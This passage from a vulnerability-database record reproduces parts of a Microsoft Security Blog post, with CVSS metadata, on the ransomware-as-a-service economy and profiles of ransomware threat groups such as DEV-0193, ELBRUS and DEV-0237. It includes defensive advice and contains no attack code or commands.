[CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&amp;CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we&#x27;re introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&amp;A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-09T13:00:00", "type": "mssecure", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-05-09T16:00:24", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to 